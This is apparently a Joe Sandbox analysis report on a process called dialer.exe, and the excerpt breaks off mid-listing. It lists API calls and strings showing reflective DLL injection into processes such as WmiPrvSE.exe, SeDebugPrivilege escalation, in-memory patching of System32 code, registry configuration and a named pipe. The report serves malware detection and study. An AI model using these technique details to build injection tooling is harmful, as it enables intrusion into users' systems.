Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: d<m{8
API String ID: 546120528-753981864
Opcode ID: 35d6533b1720f8da579d8e82cf18d97fc9af59e992c0e4d0a17b5eb86b4e7be8
Instruction ID: c4cccaf13f2e06b59fbddb07821cd9444172bc332055974c5361f7440949707c
Opcode Fuzzy Hash: 35d6533b1720f8da579d8e82cf18d97fc9af59e992c0e4d0a17b5eb86b4e7be8
Instruction Fuzzy Hash: 2681B17260AA8886F7658FA5A4C03FD7FE3E345740FD84116DA8A8F6D1DB38D961DB00

Function 00000125D40126F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000125D40127D4
StrCpyW.SHLWAPI ref: 00000125D40127ED

Strings

\\.\pipe\, xrefs: 00000125D40127DF

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: d92c1fc35dbb274e8886666898b8e98769b739aada120b19a976d28340ae785a
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 0671E732216F8946E724DFA999C43FA6B96F745B84FC4001ADE499BB88DF34C6248700

Function 00000125D40190D8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

RtlUnwindEx.NTDLL ref: 00000125D40191E7

Strings

csm, xrefs: 00000125D401917E
f, xrefs: 00000125D4019116

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Unwind
String ID: csm$f
API String ID: 3419175465-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: f28ddab87ef8de6a133cd3c2b396961cf428b2a55da54b1610c565b4797e3c05
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 0751B532712A588BEB14DFA5E4C4BF93B97F384B88F908124DE568B788DB75D991C700

Function 00000125D40124DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000125D40125C3
StrCpyW.SHLWAPI ref: 00000125D40125DA

Strings

\\.\pipe\, xrefs: 00000125D40125CE

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: f8da05b1c2e571ef2f8cf25c10bc8bce6c9f07cffd3e19c0481a76f7f0cc7353
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 9651D832206F8942E7349FB595D43FE6E52F385780F850029DD869BBD9CB39C5318B40

Function 00000125D401C7DC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00000125D401C81E

Strings

d<m{8, xrefs: 00000125D401C7F6
, xrefs: 00000125D401C861

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Info
String ID: $d<m{8
API String ID: 1807457897-974700232
Opcode ID: e4a143ca4120123da4d2f14e02aee1ec5d2bf5d6a13d88a6f2b8b94793a2fa23
Instruction ID: 1033782f94b7f0f30c32ded97ee0ec21c863ba91a22c78bfa1f42120233a6626
Opcode Fuzzy Hash: e4a143ca4120123da4d2f14e02aee1ec5d2bf5d6a13d88a6f2b8b94793a2fa23
Instruction Fuzzy Hash: 9F51C93261DAD486E725CF74D0C43ED7FA1F349B48F944116EA898BA89C778C555CF80

Function 00000125D40204E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000125D40205B2
GetLastError.KERNEL32 ref: 00000125D40205CE

Strings

d<m{8, xrefs: 00000125D4020503

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: d<m{8
API String ID: 442123175-753981864
Opcode ID: 41a51caffb26de89bbe0c185f881ee4edcf50a5614ce5641243d2a174bd7e7c3
Instruction ID: 4070a08f3fc1058e230dc6dde15fe42708022f07a91c744b16972259c14ba40a
Opcode Fuzzy Hash: 41a51caffb26de89bbe0c185f881ee4edcf50a5614ce5641243d2a174bd7e7c3
Instruction Fuzzy Hash: F631B372311F5497DB10AF55E8C43EA67A2F748780F848026EB4D8B794DB38D561C700

Function 00000125D40203E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000125D4020497
GetLastError.KERNEL32 ref: 00000125D40204B3

Strings

d<m{8, xrefs: 00000125D40203FF

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: d<m{8
API String ID: 442123175-753981864
Opcode ID: 52c4664a05fe08042f934c792fbe9bb495d98380603adefd8139ce93c4d597c0
Instruction ID: 13b481d5d560ec6c741b76e2009e32a533e71b359cc92e6783faae3e4d8779bd
Opcode Fuzzy Hash: 52c4664a05fe08042f934c792fbe9bb495d98380603adefd8139ce93c4d597c0
Instruction Fuzzy Hash: 3231B172614F8887DB109F65E4C47E97BA6F358784F848022EB8D8B795DB38D526CB00

Function 00000125D401C3F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00000125D401C42C
GetLastError.KERNEL32 ref: 00000125D401C436

Strings

d<m{8, xrefs: 00000125D401C40A

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: d<m{8
API String ID: 2776309574-753981864
Opcode ID: 31f6bd162c74a95353f8a4d922ed4d515b5d77d8aca2042f3fab3af1802124d8
Instruction ID: b159d719a6e7d02145b4c9444b1655ed61654ad5bc94d10aff8866b82b66e2ca
Opcode Fuzzy Hash: 31f6bd162c74a95353f8a4d922ed4d515b5d77d8aca2042f3fab3af1802124d8
Instruction Fuzzy Hash: 6A31833221DFC887E760DBA5E4C03FA6BA6F388794F944115D68D8BA99DB38C550CF00

Function 00000125D40194A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000125D40194E8
RaiseException.KERNEL32 ref: 00000125D401952E

Strings

csm, xrefs: 00000125D401951B

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 6ff16c4684e6e7cbc76bef71a6a2d0f590b759f9b2b1dffb73ada4b5d238bf73
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 1D11EF32215F8482EB618F55E5802A97BA5F788B98F584225EF8D4B764DF3CC565CB00

Analysis Process: dialer.exePID: 8464, Parent PID: 5028COMMON

Execution Graph

Execution Coverage:	47.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	37.2%
Total number of Nodes:	231
Total number of Limit Nodes:	25

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF744DD2328 Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 194
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF744DD2078: StrCpyW.SHLWAPI ref: 00007FF744DD20AA
Part of subcall function 00007FF744DD2078: StrCatW.SHLWAPI ref: 00007FF744DD20B8
Part of subcall function 00007FF744DD2078: GetModuleHandleW.KERNEL32 ref: 00007FF744DD20C1
Part of subcall function 00007FF744DD2078: GetCurrentProcess.KERNEL32 ref: 00007FF744DD210C
Part of subcall function 00007FF744DD2078: K32GetModuleInformation.KERNEL32 ref: 00007FF744DD2120
Part of subcall function 00007FF744DD2078: CreateFileW.KERNELBASE ref: 00007FF744DD2150
Part of subcall function 00007FF744DD2078: CreateFileMappingW.KERNELBASE ref: 00007FF744DD217B
Part of subcall function 00007FF744DD2078: MapViewOfFile.KERNELBASE ref: 00007FF744DD219F
Part of subcall function 00007FF744DD2078: lstrcmpiA.KERNEL32 ref: 00007FF744DD21EA
Part of subcall function 00007FF744DD2078: CloseHandle.KERNELBASE ref: 00007FF744DD2258
Part of subcall function 00007FF744DD2078: CloseHandle.KERNEL32 ref: 00007FF744DD2261
Part of subcall function 00007FF744DD2078: FreeLibrary.KERNEL32 ref: 00007FF744DD226A

VerSetConditionMask.NTDLL ref: 00007FF744DD2397
VerSetConditionMask.NTDLL ref: 00007FF744DD23A8
VerSetConditionMask.NTDLL ref: 00007FF744DD23B9
VerifyVersionInfoW.KERNEL32 ref: 00007FF744DD23CC
GetCurrentProcessId.KERNEL32 ref: 00007FF744DD23DE
OpenProcess.KERNEL32 ref: 00007FF744DD23EE
OpenProcessToken.ADVAPI32 ref: 00007FF744DD240F
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF744DD2429
AdjustTokenPrivileges.KERNELBASE ref: 00007FF744DD246D
GetLastError.KERNEL32 ref: 00007FF744DD2477
CloseHandle.KERNELBASE ref: 00007FF744DD2480
FindResourceExA.KERNEL32 ref: 00007FF744DD2494
SizeofResource.KERNEL32 ref: 00007FF744DD24AB
LoadResource.KERNEL32 ref: 00007FF744DD24C4
LockResource.KERNEL32 ref: 00007FF744DD24D6
GetCurrentProcessId.KERNEL32 ref: 00007FF744DD24E3
RegCreateKeyExW.KERNELBASE ref: 00007FF744DD2524
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF744DD2557
RegSetKeySecurity.KERNELBASE ref: 00007FF744DD2574
LocalFree.KERNEL32 ref: 00007FF744DD2581
RegCreateKeyExW.KERNELBASE ref: 00007FF744DD25B9
GetCurrentProcessId.KERNEL32 ref: 00007FF744DD25C3
RegSetValueExW.KERNELBASE ref: 00007FF744DD25F1
RegCloseKey.KERNELBASE ref: 00007FF744DD25FC
RegCloseKey.ADVAPI32 ref: 00007FF744DD2607
CreateThread.KERNELBASE ref: 00007FF744DD2628
GetProcessHeap.KERNEL32 ref: 00007FF744DD262E
HeapAlloc.KERNEL32 ref: 00007FF744DD263D
CreateThread.KERNELBASE ref: 00007FF744DD266C
CreateThread.KERNELBASE ref: 00007FF744DD268D
SleepEx.KERNELBASE ref: 00007FF744DD2695

Strings

DLL, xrefs: 00007FF744DD2486
ntdll.dll, xrefs: 00007FF744DD233B
pid, xrefs: 00007FF744DD2596
kernel32.dll, xrefs: 00007FF744DD23D2
SOFTWARE\dialerconfig, xrefs: 00007FF744DD24FF
svc64, xrefs: 00007FF744DD25CE
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 00007FF744DD2550
SeDebugPrivilege, xrefs: 00007FF744DD2422

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: CreateProcess$Close$CurrentHandleResource$ConditionFileMaskSecurityThread$DescriptorFreeHeapModuleOpenTokenValue$AdjustAllocConvertErrorFindInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
API String ID: 2439791646-1130149537
Opcode ID: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
Instruction ID: f94c9f37d268f2f42c4f15a63d8d1d8fe594422477c1bdf330da70fa66dae84d
Opcode Fuzzy Hash: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
Instruction Fuzzy Hash: F1A1FCB5A0CB82C6EB20BF62E8946A9B7A1FB88754F804135DE5D47768DF3CD148DB10

Function 00007FF744DD10C0 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 259
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF744DD19AC: OpenProcess.KERNEL32(?,?,?,00007FF744DD110E), ref: 00007FF744DD19CA
Part of subcall function 00007FF744DD19AC: IsWow64Process.KERNEL32(?,?,?,00007FF744DD110E), ref: 00007FF744DD19E0
Part of subcall function 00007FF744DD19AC: CloseHandle.KERNELBASE(?,?,?,00007FF744DD110E), ref: 00007FF744DD19FB

OpenProcess.KERNEL32 ref: 00007FF744DD112C
OpenProcess.KERNEL32 ref: 00007FF744DD114B
K32GetModuleFileNameExW.KERNEL32 ref: 00007FF744DD1170
PathFindFileNameW.SHLWAPI ref: 00007FF744DD117E
lstrlenW.KERNEL32 ref: 00007FF744DD118A
StrCpyW.SHLWAPI ref: 00007FF744DD11A1
CloseHandle.KERNEL32 ref: 00007FF744DD11AD
StrCmpIW.SHLWAPI ref: 00007FF744DD11ED
NtQueryInformationProcess.NTDLL ref: 00007FF744DD1221
OpenProcessToken.ADVAPI32 ref: 00007FF744DD124B
GetTokenInformation.KERNELBASE ref: 00007FF744DD1277
GetLastError.KERNEL32 ref: 00007FF744DD1281
LocalAlloc.KERNEL32 ref: 00007FF744DD1294
GetTokenInformation.KERNELBASE ref: 00007FF744DD12C0
GetSidSubAuthorityCount.ADVAPI32 ref: 00007FF744DD12CD
GetSidSubAuthority.ADVAPI32 ref: 00007FF744DD12DC
LocalFree.KERNEL32 ref: 00007FF744DD12F4
CloseHandle.KERNEL32 ref: 00007FF744DD1308
StrStrA.SHLWAPI ref: 00007FF744DD13B2
VirtualAllocEx.KERNELBASE ref: 00007FF744DD1419
WriteProcessMemory.KERNELBASE ref: 00007FF744DD143C
WaitForSingleObject.KERNEL32 ref: 00007FF744DD1488
GetExitCodeThread.KERNEL32 ref: 00007FF744DD149E
CloseHandle.KERNELBASE ref: 00007FF744DD14B6
CloseHandle.KERNEL32 ref: 00007FF744DD14BF

Strings

@, xrefs: 00007FF744DD140C
ReflectiveDllMain, xrefs: 00007FF744DD13A8
WmiPrvSE.exe, xrefs: 00007FF744DD11CC
dialer.exe, xrefs: 00007FF744DD11D8
MSBuild.exe, xrefs: 00007FF744DD11B8

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
String ID: @$MSBuild.exe$ReflectiveDllMain$WmiPrvSE.exe$dialer.exe
API String ID: 2561231171-2835194517
Opcode ID: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
Instruction ID: 54546746a18933aaa2638028530c4da895ffee3bd7c6c77edb96976f6e918c7e
Opcode Fuzzy Hash: 544d3209d9aa9e6ba5ca7d9f2d2eefc3a9e0a6ddaab6f3d4a2b6f9620268a1a8
Instruction Fuzzy Hash: 80B13BA1A0C642C6EF20BF12A980679A7A5FB48B85F804135CF6E47758DE3CE545EB60

Function 00007FF744DD14E4 Relevance: 19.6, APIs: 13, Instructions: 130
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF744DD1517
HeapAlloc.KERNEL32 ref: 00007FF744DD152A
GetProcessHeap.KERNEL32 ref: 00007FF744DD1538
HeapAlloc.KERNEL32 ref: 00007FF744DD1549
K32EnumProcesses.KERNEL32 ref: 00007FF744DD1563
OpenProcess.KERNEL32 ref: 00007FF744DD1591
K32EnumProcessModules.KERNEL32 ref: 00007FF744DD15B6
ReadProcessMemory.KERNELBASE ref: 00007FF744DD15ED
CloseHandle.KERNELBASE ref: 00007FF744DD1629
GetProcessHeap.KERNEL32 ref: 00007FF744DD163B
HeapFree.KERNEL32 ref: 00007FF744DD1649
GetProcessHeap.KERNEL32 ref: 00007FF744DD164F
HeapFree.KERNEL32 ref: 00007FF744DD165D

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
Instruction ID: ed7a03b24689ff4968f05491a5d3631c779aff961c7788db0eb47817d0dac918
Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
Instruction Fuzzy Hash: 7251B1B2B19682CAEB60FF6398846ADA7A0FB49B85F844034DF2D47758DE3CD445DB10

Function 00007FF744DD1C64 Relevance: 9.1, APIs: 6, Instructions: 88
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00007FF744DD1CB3
SetEntriesInAclW.ADVAPI32 ref: 00007FF744DD1D14
LocalAlloc.KERNEL32 ref: 00007FF744DD1D24
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF744DD1D3A
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF744DD1D52
CreateNamedPipeW.KERNELBASE ref: 00007FF744DD1D94

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
Instruction ID: 6184a3633432929330242dabcf519c62c83de237da30becea5d50cc207249b12
Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
Instruction Fuzzy Hash: 34417C72618A41CAEB60EF25E4807AD77A4FB48798F80013AEF5D43B98DF78D508DB50

Function 00007FF744DD2078 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 128
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 00007FF744DD20AA
StrCatW.SHLWAPI ref: 00007FF744DD20B8
GetModuleHandleW.KERNEL32 ref: 00007FF744DD20C1
GetCurrentProcess.KERNEL32 ref: 00007FF744DD210C
K32GetModuleInformation.KERNEL32 ref: 00007FF744DD2120
CreateFileW.KERNELBASE ref: 00007FF744DD2150
CreateFileMappingW.KERNELBASE ref: 00007FF744DD217B
MapViewOfFile.KERNELBASE ref: 00007FF744DD219F
lstrcmpiA.KERNEL32 ref: 00007FF744DD21EA
VirtualProtect.KERNELBASE ref: 00007FF744DD2221
VirtualProtect.KERNELBASE ref: 00007FF744DD224F
CloseHandle.KERNELBASE ref: 00007FF744DD2258
CloseHandle.KERNEL32 ref: 00007FF744DD2261
FreeLibrary.KERNEL32 ref: 00007FF744DD226A

Strings

C:\Windows\System32\, xrefs: 00007FF744DD209B
.text, xrefs: 00007FF744DD21E3

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
Instruction ID: 8607f1964464c1c01091b1a8dfbb4ad4ed88d249f5db8525f60f09865b7d8ff9
Opcode Fuzzy Hash: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
Instruction Fuzzy Hash: 33514F6570C642D2EF21BF56A89466AF7A0FB88B98F844131DF5D03798DE3CD409DB20

Function 00007FF744DD2D84 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF744DD1C64: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF744DD1CB3
Part of subcall function 00007FF744DD1C64: SetEntriesInAclW.ADVAPI32 ref: 00007FF744DD1D14
Part of subcall function 00007FF744DD1C64: LocalAlloc.KERNEL32 ref: 00007FF744DD1D24
Part of subcall function 00007FF744DD1C64: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF744DD1D3A
Part of subcall function 00007FF744DD1C64: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF744DD1D52
Part of subcall function 00007FF744DD1C64: CreateNamedPipeW.KERNELBASE ref: 00007FF744DD1D94

Sleep.KERNEL32 ref: 00007FF744DD2DA9
ConnectNamedPipe.KERNELBASE ref: 00007FF744DD2DB6
ReadFile.KERNELBASE ref: 00007FF744DD2DD9
WriteFile.KERNEL32 ref: 00007FF744DD2E07
Sleep.KERNEL32 ref: 00007FF744DD2E14
DisconnectNamedPipe.KERNELBASE ref: 00007FF744DD2E1D

Strings

\\.\pipe\dialerchildproc64, xrefs: 00007FF744DD2D91
M, xrefs: 00007FF744DD2DFA

Memory Dump Source

Source File: 00000013.00000002.11738774848.00007FF744DD1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF744DD0000, based on PE: true

Associated: 00000013.00000002.11738686661.00007FF744DD0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738840022.00007FF744DD3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000013.00000002.11738910339.00007FF744DD6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff744dd0000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\dialerchildproc64
API String ID: 2203880229-3489460547
Opcode ID: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
Instruction ID: ba3d57daac051bf243bfa3abddbbc2f4b8e4f90bba62c2324a66dc6d39bdb490
Opcode Fuzzy Hash: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
Instruction Fuzzy Hash: B61112A161C642D1FA14FF12E8943B9E360EB847A0F844234DF6A466D8CF7CE548EB60

Function 00007FF744DD228C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
